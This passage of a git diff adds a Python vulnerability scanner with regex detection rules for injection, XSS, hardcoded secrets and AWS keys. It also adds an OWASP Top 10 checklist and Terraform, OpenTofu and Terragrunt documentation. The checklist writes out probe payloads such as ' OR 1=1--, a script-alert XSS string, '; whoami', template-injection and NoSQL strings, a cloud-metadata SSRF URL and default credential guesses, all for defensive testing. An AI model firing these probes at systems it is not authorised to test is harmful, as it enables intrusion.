+                "owasp_category": "A03:2021 - Injection",
+                "pattern": r'''(?:execute|query|cursor\.execute)\s*\(\s*(?:f["\']|["\'].*%s|["\'].*\+\s*\w+|["\'].*\.format)''',
+                "recommendation": "Use parameterized queries or prepared statements instead of string concatenation.",
+                "extensions": {".py", ".js", ".ts", ".java", ".rb", ".php"},
+            },
+            {
+                "rule_id": "SQLI-002",
+                "title": "Potential SQL Injection (template literal)",
+                "severity": "critical",
+                "owasp_category": "A03:2021 - Injection",
+                "pattern": r'''(?:query|execute|raw)\s*\(\s*`[^`]*\$\{''',
+                "recommendation": "Use parameterized queries. Never interpolate user input into SQL strings.",
+                "extensions": {".js", ".ts", ".jsx", ".tsx"},
+            },
+            {
+                "rule_id": "XSS-001",
+                "title": "Potential DOM-based XSS (innerHTML)",
+                "severity": "high",
+                "owasp_category": "A03:2021 - Injection",
+                "pattern": r'''\.innerHTML\s*=\s*(?!['"][^'"]*['"])''',
+                "recommendation": "Use textContent or a sanitization library (DOMPurify) instead of innerHTML.",
+                "extensions": {".js", ".ts", ".jsx", ".tsx", ".html", ".vue", ".svelte"},
+            },
+            {
+                "rule_id": "XSS-002",
+                "title": "React dangerouslySetInnerHTML usage",
+                "severity": "high",
+                "owasp_category": "A03:2021 - Injection",
+                "pattern": r'''dangerouslySetInnerHTML''',
+                "recommendation": "Sanitize HTML with DOMPurify before using dangerouslySetInnerHTML.",
+                "extensions": {".jsx", ".tsx", ".js", ".ts"},
+            },
+            {
+                "rule_id": "CMDI-001",
+                "title": "Potential Command Injection (shell=True)",
+                "severity": "critical",
+                "owasp_category": "A03:2021 - Injection",
+                "pattern": r'''subprocess\.\w+\(.*shell\s*=\s*True''',
+                "recommendation": "Avoid shell=True. Use subprocess with a list of arguments instead.",
+                "extensions": {".py"},
+            },
+            {
+                "rule_id": "CMDI-002",
+                "title": "Potential Command Injection (eval/exec)",
+                "severity": "critical",
+                "owasp_category": "A03:2021 - Injection",
+                "pattern": r'''(?:^|\s)(?:eval|exec)\s*\((?!.*(?:#\s*nosec|NOSONAR))''',
+                "recommendation": "Never use eval() or exec() with untrusted input. Use ast.literal_eval() for data parsing.",
+                "extensions": {".py", ".js", ".ts"},
+            },
+            {
+                "rule_id": "SEC-001",
+                "title": "Hardcoded Secret or API Key",
+                "severity": "critical",
+                "owasp_category": "A02:2021 - Cryptographic Failures",
+                "pattern": r'''(?i)(?:api[_-]?key|secret[_-]?key|password|passwd|token)\s*[:=]\s*['\"][a-zA-Z0-9+/=]{16,}['\"]''',
+                "recommendation": "Move secrets to environment variables or a secrets manager (Vault, AWS Secrets Manager).",
+                "extensions": {".py", ".js", ".ts", ".jsx", ".tsx", ".java", ".go", ".rb", ".php"},
+            },
+            {
+                "rule_id": "SEC-002",
+                "title": "AWS Access Key ID detected",
+                "severity": "critical",
+                "owasp_category": "A02:2021 - Cryptographic Failures",
+                "pattern": r'''AKIA[0-9A-Z]{16}''',
+                "recommendation": "Remove the AWS key immediately. Rotate the credential and use IAM roles or environment variables.",
+                "extensions": None,  # scan all files
+            },
+            {
+                "rule_id": "CRYPTO-001",
+                "title": "Weak hashing algorithm (MD5/SHA1)",
+                "severity": "high",
+                "owasp_category": "A02:2021 - Cryptographic Failures",
+                "pattern": r'''(?:md5|sha1)\s*\(''',
+                "recommendation": "Use bcrypt, scrypt, or argon2 for passwords. Use SHA-256+ for integrity checks.",
+                "extensions": {".py", ".js", ".ts", ".java", ".go", ".rb", ".php"},
+            },
+            {
+                "rule_id": "SSRF-001",
+                "title": "Potential SSRF (user-controlled URL in HTTP request)",
+                "severity": "high",
+                "owasp_category": "A10:2021 - SSRF",
+                "pattern": r'''(?:requests\.get|fetch|axios|http\.get|urllib\.request\.urlopen)\s*\(\s*(?:request\.|req\.|params|args|input|user)''',
+                "recommendation": "Validate and allowlist URLs before making outbound requests. Block internal IPs.",
+                "extensions": {".py", ".js", ".ts", ".jsx", ".tsx", ".java", ".go"},
+            },
+            {
+                "rule_id": "PATH-001",
+                "title": "Potential Path Traversal",
+                "severity": "high",
+                "owasp_category": "A01:2021 - Broken Access Control",
+                "pattern": r'''(?:open|readFile|readFileSync|Path\.join)\s*\(.*(?:request\.|req\.|params|args|input|user)''',
+                "recommendation": "Sanitize file paths. Use os.path.basename() and validate against an allowlist.",
+                "extensions": {".py", ".js", ".ts", ".java", ".go"},
+            },
+            {
+                "rule_id": "DESER-001",
+                "title": "Unsafe Deserialization (pickle/yaml.load)",
+                "severity": "critical",
+                "owasp_category": "A08:2021 - Software and Data Integrity Failures",
+                "pattern": r'''(?:pickle\.load|yaml\.load\s*\([^)]*\)\s*(?!.*Loader\s*=\s*yaml\.SafeLoader))''',
+                "recommendation": "Use yaml.safe_load() instead of yaml.load(). Avoid pickle for untrusted data.",
+                "extensions": {".py"},
+            },
+            {
+                "rule_id": "AUTH-001",
+                "title": "JWT with hardcoded secret",
+                "severity": "critical",
+                "owasp_category": "A07:2021 - Identification and Authentication Failures",
+                "pattern": r'''jwt\.(?:encode|sign)\s*\([^)]*['\"][a-zA-Z0-9]{8,}['\"]''',
+                "recommendation": "Load JWT secrets from environment variables. Use RS256 with key pairs for production.",
+                "extensions": {".py", ".js", ".ts"},
+            },
+        ]
+
+        lines = content.split("\n")
+        for i, line in enumerate(lines, 1):
+            for pat in patterns:
+                exts = pat.get("extensions")
+                if exts and file_path.suffix not in exts:
+                    continue
+                if re.search(pat["pattern"], line):
+                    findings.append(SourceFinding(
+                        rule_id=pat["rule_id"],
+                        title=pat["title"],
+                        severity=pat["severity"],
+                        owasp_category=pat["owasp_category"],
+                        file_path=str(file_path),
+                        line_number=i,
+                        code_snippet=line.strip()[:200],
+                        recommendation=pat["recommendation"],
+                    ))
+        return findings
+
+    def _get_owasp_checks(self) -> List[CheckItem]:
+        """Return comprehensive OWASP Top 10 checklist items."""
+        checks = [
+            # A01: Broken Access Control
+            CheckItem("A01", "Broken Access Control", "A01-01",
+                      "Horizontal Privilege Escalation",
+                      "Verify users cannot access other users' resources by changing IDs.",
+                      "Change resource IDs in API requests (e.g., /users/123 → /users/124). Expect 403.",
+                      "critical", ["web", "api", "all"]),
+            CheckItem("A01", "Broken Access Control", "A01-02",
+                      "Vertical Privilege Escalation",
+                      "Verify regular users cannot access admin endpoints.",
+                      "Authenticate as regular user, request admin endpoints. Expect 403.",
+                      "critical", ["web", "api", "all"]),
+            CheckItem("A01", "Broken Access Control", "A01-03",
+                      "CORS Misconfiguration",
+                      "Verify CORS policy does not allow arbitrary origins.",
+                      "Send request with Origin: https://evil.com. Check Access-Control-Allow-Origin.",
+                      "high", ["web", "api"]),
+            CheckItem("A01", "Broken Access Control", "A01-04",
+                      "Forced Browsing",
+                      "Check for unprotected admin or debug pages.",
+                      "Request /admin, /debug, /api/admin, /.env, /swagger. Expect 403 or 404.",
+                      "high", ["web", "all"]),
+            CheckItem("A01", "Broken Access Control", "A01-05",
+                      "Directory Listing",
+                      "Verify directory listing is disabled on the web server.",
+                      "Request directory paths without index file. Should not list contents.",
+                      "medium", ["web"]),
+
+            # A02: Cryptographic Failures
+            CheckItem("A02", "Cryptographic Failures", "A02-01",
+                      "TLS Version Check",
+                      "Ensure TLS 1.2+ is enforced. Reject TLS 1.0/1.1.",
+                      "Run: nmap --script ssl-enum-ciphers -p 443 target.com",
+                      "high", ["web", "api", "all"]),
+            CheckItem("A02", "Cryptographic Failures", "A02-02",
+                      "Password Hashing Algorithm",
+                      "Verify passwords use bcrypt/scrypt/argon2 with adequate cost.",
+                      "Review authentication code for hashing implementation.",
+                      "critical", ["web", "api", "all"]),
+            CheckItem("A02", "Cryptographic Failures", "A02-03",
+                      "Sensitive Data in URLs",
+                      "Check for tokens, passwords, or PII in query parameters.",
+                      "Review access logs and URL patterns for sensitive query params.",
+                      "high", ["web", "api"]),
+            CheckItem("A02", "Cryptographic Failures", "A02-04",
+                      "HSTS Header",
+                      "Verify Strict-Transport-Security header is present.",
+                      "Check response headers for HSTS with max-age >= 31536000.",
+                      "medium", ["web"]),
+
+            # A03: Injection
+            CheckItem("A03", "Injection", "A03-01",
+                      "SQL Injection",
+                      "Test input fields for SQL injection vulnerabilities.",
+                      "Submit ' OR 1=1-- in input fields. Check for errors or unexpected behavior.",
+                      "critical", ["web", "api", "all"]),
+            CheckItem("A03", "Injection", "A03-02",
+                      "XSS (Cross-Site Scripting)",
+                      "Test for reflected, stored, and DOM-based XSS.",
+                      "Submit <script>alert(1)</script> in input fields. Check if rendered.",
+                      "high", ["web", "all"]),
+            CheckItem("A03", "Injection", "A03-03",
+                      "Command Injection",
+                      "Test for OS command injection in input fields.",
+                      "Submit ; whoami in fields that may trigger system commands.",
+                      "critical", ["web", "api"]),
+            CheckItem("A03", "Injection", "A03-04",
+                      "Template Injection",
+                      "Test for server-side template injection.",
+                      "Submit {{7*7}} and ${7*7} in input fields. Check for 49 in response.",
+                      "high", ["web", "api"]),
+            CheckItem("A03", "Injection", "A03-05",
+                      "NoSQL Injection",
+                      "Test for NoSQL injection in JSON inputs.",
+                      "Submit {\"$gt\": \"\"} in JSON fields. Check for data leakage.",
+                      "high", ["api"]),
+
+            # A04: Insecure Design
+            CheckItem("A04", "Insecure Design", "A04-01",
+                      "Rate Limiting on Authentication",
+                      "Verify rate limiting exists on login and password reset endpoints.",
+                      "Send 50+ rapid login requests. Expect 429 after threshold.",
+                      "high", ["web", "api", "all"]),
+            CheckItem("A04", "Insecure Design", "A04-02",
+                      "Business Logic Abuse",
+                      "Test for business logic flaws (negative quantities, state manipulation).",
+                      "Try negative values, skip steps in workflows, manipulate client-side calculations.",
+                      "high", ["web", "api"]),
+            CheckItem("A04", "Insecure Design", "A04-03",
+                      "Account Lockout",
+                      "Verify account lockout after repeated failed login attempts.",
+                      "Submit 10+ failed login attempts. Check for lockout or CAPTCHA.",
+                      "medium", ["web", "api"]),
+
+            # A05: Security Misconfiguration
+            CheckItem("A05", "Security Misconfiguration", "A05-01",
+                      "Default Credentials",
+                      "Check for default credentials on admin panels and services.",
+                      "Try admin:admin, root:root, admin:password on all login forms.",
+                      "critical", ["web", "api", "all"]),
+            CheckItem("A05", "Security Misconfiguration", "A05-02",
+                      "Debug Mode in Production",
+                      "Verify debug mode is disabled in production.",
+                      "Trigger errors and check for stack traces, debug info, or verbose errors.",
+                      "high", ["web", "api", "all"]),
+            CheckItem("A05", "Security Misconfiguration", "A05-03",
+                      "Security Headers",
+                      "Verify all security headers are present and properly configured.",
+                      "Check for CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy.",
+                      "medium", ["web"]),
+            CheckItem("A05", "Security Misconfiguration", "A05-04",
+                      "Unnecessary HTTP Methods",
+                      "Verify only required HTTP methods are enabled.",
+                      "Send OPTIONS request. Check for TRACE, DELETE on public endpoints.",
+                      "low", ["web", "api"]),
+
+            # A06: Vulnerable Components
+            CheckItem("A06", "Vulnerable and Outdated Components", "A06-01",
+                      "Dependency CVE Audit",
+                      "Scan all dependencies for known CVEs.",
+                      "Run npm audit, pip audit, govulncheck, or bundle audit.",
+                      "high", ["web", "api", "mobile", "all"]),
+            CheckItem("A06", "Vulnerable and Outdated Components", "A06-02",
+                      "End-of-Life Framework Check",
+                      "Verify no EOL frameworks or languages are in use.",
+                      "Check framework versions against vendor EOL dates.",
+                      "medium", ["web", "api", "all"]),
+
+            # A07: Authentication Failures
+            CheckItem("A07", "Identification and Authentication Failures", "A07-01",
+                      "Brute Force Protection",
+                      "Verify brute force protection on authentication endpoints.",
+                      "Send 100 rapid login attempts. Expect blocking after threshold.",
+                      "high", ["web", "api", "all"]),
+            CheckItem("A07", "Identification and Authentication Failures", "A07-02",
+                      "Session Management",
+                      "Verify sessions are properly managed (HttpOnly, Secure, SameSite).",
+                      "Check cookie flags: HttpOnly, Secure, SameSite=Strict|Lax.",
+                      "high", ["web"]),
+            CheckItem("A07", "Identification and Authentication Failures", "A07-03",
+                      "Session Invalidation on Logout",
+                      "Verify sessions are invalidated on logout.",
+                      "Logout, then replay the session cookie. Should receive 401.",
+                      "high", ["web", "api"]),
+            CheckItem("A07", "Identification and Authentication Failures", "A07-04",
+                      "Username Enumeration",
+                      "Check for username enumeration via error messages.",
+                      "Submit valid and invalid usernames. Error messages should be identical.",
+                      "medium", ["web", "api"]),
+
+            # A08: Data Integrity
+            CheckItem("A08", "Software and Data Integrity Failures", "A08-01",
+                      "Unsafe Deserialization",
+                      "Check for unsafe deserialization of user input.",
+                      "Review code for pickle.load(), yaml.load(), Java ObjectInputStream.",
+                      "critical", ["web", "api"]),
+            CheckItem("A08", "Software and Data Integrity Failures", "A08-02",
+                      "Subresource Integrity",
+                      "Verify SRI hashes on CDN-loaded scripts and stylesheets.",
+                      "Check <script> and <link> tags for integrity attributes.",
+                      "medium", ["web"]),
+
+            # A09: Logging Failures
+            CheckItem("A09", "Security Logging and Monitoring Failures", "A09-01",
+                      "Authentication Event Logging",
+                      "Verify login success and failure events are logged.",
+                      "Attempt valid and invalid logins. Check server logs for entries.",
+                      "medium", ["web", "api", "all"]),
+            CheckItem("A09", "Security Logging and Monitoring Failures", "A09-02",
+                      "Sensitive Data in Logs",
+                      "Verify passwords, tokens, and PII are not logged.",
+                      "Review log configuration and sample log output for sensitive data.",
+                      "high", ["web", "api", "all"]),
+
+            # A10: SSRF
+            CheckItem("A10", "Server-Side Request Forgery", "A10-01",
+                      "Internal Network Access via SSRF",
+                      "Test URL input fields for SSRF vulnerabilities.",
+                      "Submit http://169.254.169.254/ and http://127.0.0.1 in URL fields.",
+                      "critical", ["web", "api"]),
+            CheckItem("A10", "Server-Side Request Forgery", "A10-02",
+                      "DNS Rebinding",
+                      "Test for DNS rebinding attacks on URL validators.",
+                      "Use a DNS rebinding service to bypass allowlist validation.",
+                      "high", ["web", "api"]),
+        ]
+        return checks
+
+
+def format_checklist_text(checks: List[CheckItem]) -> str:
+    """Format checklist as human-readable text."""
+    lines = []
+    lines.append("=" * 70)
+    lines.append("OWASP TOP 10 SECURITY CHECKLIST")
+    lines.append(f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
+    lines.append(f"Total checks: {len(checks)}")
+    lines.append("=" * 70)
+
+    current_category = ""
+    for check in checks:
+        if check.owasp_category != current_category:
+            current_category = check.owasp_category
+            lines.append(f"\n--- {check.owasp_id}: {check.owasp_category} ---\n")
+        sev_marker = {"critical": "[!!!]", "high": "[!! ]", "medium": "[!  ]", "low": "[.  ]", "info": "[   ]"}
+        marker = sev_marker.get(check.severity, "[   ]")
+        lines.append(f"  {marker} [{check.check_id}] {check.title}")
+        lines.append(f"       {check.description}")
+        lines.append(f"       Test: {check.test_procedure}")
+        lines.append(f"       Severity: {check.severity.upper()}")
+        lines.append("")
+    return "\n".join(lines)
+
+
+def format_findings_text(findings: List[SourceFinding]) -> str:
+    """Format source findings as human-readable text."""
+    if not findings:
+        return "No vulnerability patterns detected in source code."
+    lines = []
+    lines.append(f"\nSOURCE CODE FINDINGS: {len(findings)} issue(s) found\n")
+    by_severity = {"critical": [], "high": [], "medium": [], "low": [], "info": []}
+    for f in findings:
+        by_severity.get(f.severity, by_severity["info"]).append(f)
+    for sev in ["critical", "high", "medium", "low", "info"]:
+        group = by_severity[sev]
+        if not group:
+            continue
+        lines.append(f"  [{sev.upper()}] ({len(group)} finding(s))")
+        for f in group:
+            lines.append(f"    - {f.title} [{f.rule_id}]")
+            lines.append(f"      File: {f.file_path}:{f.line_number}")
+            lines.append(f"      Code: {f.code_snippet}")
+            lines.append(f"      Fix:  {f.recommendation}")
+            lines.append("")
+    return "\n".join(lines)
+
+
+def main():
+    parser = argparse.ArgumentParser(
+        description="Vulnerability Scanner — Generate OWASP Top 10 checklists and scan source code for vulnerability patterns.",
+        formatter_class=argparse.RawDescriptionHelpFormatter,
+        epilog="""
+Examples:
+  %(prog)s --target web --scope full
+  %(prog)s --target api --scope quick --json
+  %(prog)s --target web --source /path/to/code --scope full
+  %(prog)s --target mobile --scope quick --json
+        """,
+    )
+    parser.add_argument("--target", choices=["web", "api", "mobile"], default="web",
+                        help="Target application type (default: web)")
+    parser.add_argument("--scope", choices=["quick", "full"], default="full",
+                        help="Scan scope: quick (high/critical only) or full (default: full)")
+    parser.add_argument("--source", metavar="PATH",
+                        help="Optional: path to source code directory to scan for patterns")
+    parser.add_argument("--json", action="store_true", dest="json_output",
+                        help="Output results as JSON")
+    args = parser.parse_args()
+
+    scanner = VulnerabilityScanner(target=args.target, scope=args.scope)
+    checklist = scanner.generate_checklist()
+
+    source_findings = []
+    if args.source:
+        source_findings = scanner.scan_source(args.source)
+
+    if args.json_output:
+        output = {
+            "scan_metadata": {
+                "target": args.target,
+                "scope": args.scope,
+                "source_path": args.source,
+                "generated_at": datetime.now().isoformat(),
+                "checklist_count": len(checklist),
+                "source_findings_count": len(source_findings),
+            },
+            "checklist": [asdict(c) for c in checklist],
+            "source_findings": [asdict(f) for f in source_findings],
+        }
+        print(json.dumps(output, indent=2))
+    else:
+        print(format_checklist_text(checklist))
+        if source_findings:
+            print(format_findings_text(source_findings))
+        elif args.source:
+            print("\nNo vulnerability patterns detected in source code.")
+
+    # Exit with non-zero if critical/high findings found in source scan
+    critical_high = [f for f in source_findings if f.severity in ("critical", "high")]
+    if critical_high:
+        sys.exit(1)
+
+
+if __name__ == "__main__":
+    main()
--- a/engineering/terraform-patterns/SKILL.md
+++ b/engineering/terraform-patterns/SKILL.md
@@ -459,6 +459,259 @@ Flag these without being asked:

 ---

+## Multi-Cloud Provider Configuration
+
+When a single root module must provision across AWS, Azure, and GCP simultaneously.
+
+### Provider Aliasing Pattern
+
+```hcl
+terraform {
+  required_providers {
+    aws = {
+      source  = "hashicorp/aws"
+      version = "~> 5.0"
+    }
+    azurerm = {
+      source  = "hashicorp/azurerm"
+      version = "~> 3.0"
+    }
+    google = {
+      source  = "hashicorp/google"
+      version = "~> 5.0"
+    }
+  }
+}
+
+provider "aws" {
+  region = var.aws_region
+}
+
+provider "azurerm" {
+  features {}
+  subscription_id = var.azure_subscription_id
+}
+
+provider "google" {
+  project = var.gcp_project_id
+  region  = var.gcp_region
+}
+```
+
+### Shared Variables Across Providers
+
+```hcl
+variable "environment" {
+  description = "Environment name used across all providers"
+  type        = string
+  validation {
+    condition     = contains(["dev", "staging", "prod"], var.environment)
+    error_message = "Must be dev, staging, or prod."
+  }
+}
+
+locals {
+  common_tags = {
+    environment = var.environment
+    managed_by  = "terraform"
+    project     = var.project_name
+  }
+}
+```
+
+### When to Use Multi-Cloud
+
+- **Yes**: Regulatory requirements mandate data residency across providers, or the org has existing workloads on multiple clouds.
+- **No**: "Avoiding vendor lock-in" alone is not sufficient justification. Multi-cloud doubles operational complexity. Prefer single-cloud unless there is a concrete business requirement.
+
+---
+
+## OpenTofu Compatibility
+
+OpenTofu is an open-source fork of Terraform maintained by the Linux Foundation under the MPL 2.0 license.
+
+### Migration from Terraform to OpenTofu
+
+```bash
+# 1. Install OpenTofu
+brew install opentofu        # macOS
+snap install --classic tofu  # Linux
+
+# 2. Replace the binary — state files are compatible
+tofu init                    # Re-initializes with OpenTofu
+tofu plan                    # Identical plan output
+tofu apply                   # Same apply workflow
+```
+
+### License Considerations
+
+| | Terraform (1.6+) | OpenTofu |
+|---|---|---|
+| **License** | BSL 1.1 (source-available) | MPL 2.0 (open-source) |
+| **Commercial use** | Restricted for competing products | Unrestricted |
+| **Community governance** | HashiCorp | Linux Foundation |
+
+### Feature Parity
+
+OpenTofu tracks Terraform 1.6.x features. Key additions unique to OpenTofu:
+- Client-side state encryption (`tofu init -encryption`)
+- Early variable/locals evaluation
+- Provider-defined functions
+
+### When to Choose OpenTofu
+
+- You need a fully open-source license for your supply chain.
+- You want client-side state encryption without Terraform Cloud.
+- Otherwise, either tool works — the HCL syntax and provider ecosystem are identical.
+
+---
+
+## Infracost Integration
+
+Infracost estimates cloud costs from Terraform code before resources are provisioned.
+
+### PR Workflow
+
+```bash
+# Show cost breakdown for current code
+infracost breakdown --path .
+
+# Compare cost difference between current branch and main
+infracost diff --path . --compare-to infracost-base.json
+```
+
+### GitHub Actions Cost Comment
+
+```yaml
+# .github/workflows/infracost.yml
+name: Infracost
+on: [pull_request]
+
+jobs:
+  cost:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+      - uses: infracost/actions/setup@v3
+        with:
+          api-key: ${{ secrets.INFRACOST_API_KEY }}
+      - run: infracost breakdown --path ./terraform --format json --out-file /tmp/infracost.json
+      - run: infracost comment github --path /tmp/infracost.json --repo $GITHUB_REPOSITORY --pull-request ${{ github.event.pull_request.number }} --github-token ${{ secrets.GITHUB_TOKEN }} --behavior update
+```
+
+### Budget Thresholds and Cost Policy
+
+```yaml
+# infracost.yml — policy file
+version: 0.1
+policies:
+  - path: "*"
+    max_monthly_cost: "5000"    # Fail PR if estimated cost exceeds $5,000/month
+    max_cost_increase: "500"    # Fail PR if cost increase exceeds $500/month
+```
+
+---
+
+## Import Existing Infrastructure
+
+Bring manually-created resources under Terraform management.
+
+### terraform import Workflow
+
+```bash
+# 1. Write the resource block first (empty body is fine)
+# main.tf:
+# resource "aws_s3_bucket" "legacy" {}
+
+# 2. Import the resource into state
+terraform import aws_s3_bucket.legacy my-existing-bucket-name
+
+# 3. Run plan to see attribute diff
+terraform plan
+
+# 4. Fill in the resource block until plan shows no changes
+```
+
+### Bulk Import with Config Generation (Terraform 1.5+)
+
+```bash
+# Generate HCL for imported resources
+terraform plan -generate-config-out=generated.tf
+
+# Review generated.tf, then move resources into proper files
+```
+
+### Common Pitfalls
+
+- **Resource drift after import**: The imported resource may have attributes Terraform does not manage. Run `terraform plan` immediately and resolve every diff.
+- **State manipulation**: Use `terraform state mv` to rename or reorganize. Use `terraform state rm` to remove without destroying. Always back up state before manipulation: `terraform state pull > backup.tfstate`.
+- **Sensitive defaults**: Imported resources may expose secrets in state. Restrict state access and enable encryption.
+
+---
+
+## Terragrunt Patterns
+
+Terragrunt is a thin wrapper around Terraform that provides DRY configuration for multi-environment setups.
+
+### Root terragrunt.hcl (Shared Config)
+
+```hcl
+# terragrunt.hcl (root)
+remote_state {
+  backend = "s3"
+  generate = {
+    path      = "backend.tf"
+    if_exists = "overwrite_terragrunt"
+  }
+  config = {
+    bucket         = "my-org-terraform-state"
+    key            = "${path_relative_to_include()}/terraform.tfstate"
+    region         = "us-east-1"
+    encrypt        = true
+    dynamodb_table = "terraform-locks"
+  }
+}
+```
+
+### Child terragrunt.hcl (Environment Override)
+
+```hcl
+# prod/vpc/terragrunt.hcl
+include "root" {
+  path = find_in_parent_folders()
+}
+
+terraform {
+  source = "../../modules/vpc"
+}
+
+inputs = {
+  environment = "prod"
+  cidr_block  = "10.0.0.0/16"
+}
+```
+
+### Dependencies Between Modules
+
+```hcl
+# prod/eks/terragrunt.hcl
+dependency "vpc" {
+  config_path = "../vpc"
+}
+
+inputs = {
+  vpc_id     = dependency.vpc.outputs.vpc_id
+  subnet_ids = dependency.vpc.outputs.private_subnet_ids
+}
+```
+
+### When Terragrunt Adds Value
+
+- **Yes**: 3+ environments with identical module structure, shared backend config, or cross-module dependencies.
+- **No**: Single environment, small team, or simple directory-based isolation already works. Terragrunt adds a learning curve and another binary to manage.
+
+---
+
 ## Installation

 ### One-liner (any tool)
--- a/mkdocs.yml
+++ b/mkdocs.yml
@@ -122,6 +122,7 @@ nav:
      - Overview: skills/engineering-team/index.md
      - "A11y Audit": skills/engineering-team/a11y-audit.md
      - "AWS Solution Architect": skills/engineering-team/aws-solution-architect.md
+      - "Azure Cloud Architect": skills/engineering-team/azure-cloud-architect.md
      - "Code Reviewer": skills/engineering-team/code-reviewer.md
      - "Email Template Builder": skills/engineering-team/email-template-builder.md
      - "Incident Commander": skills/engineering-team/incident-commander.md
@@ -158,6 +159,7 @@ nav:
      - "Senior QA Engineer": skills/engineering-team/senior-qa.md
      - "Senior SecOps Engineer": skills/engineering-team/senior-secops.md
      - "Senior Security Engineer": skills/engineering-team/senior-security.md
+      - "Security Pen Testing": skills/engineering-team/security-pen-testing.md
      - "Stripe Integration Expert": skills/engineering-team/stripe-integration-expert.md
      - "TDD Guide": skills/engineering-team/tdd-guide.md
      - "Tech Stack Evaluator": skills/engineering-team/tech-stack-evaluator.md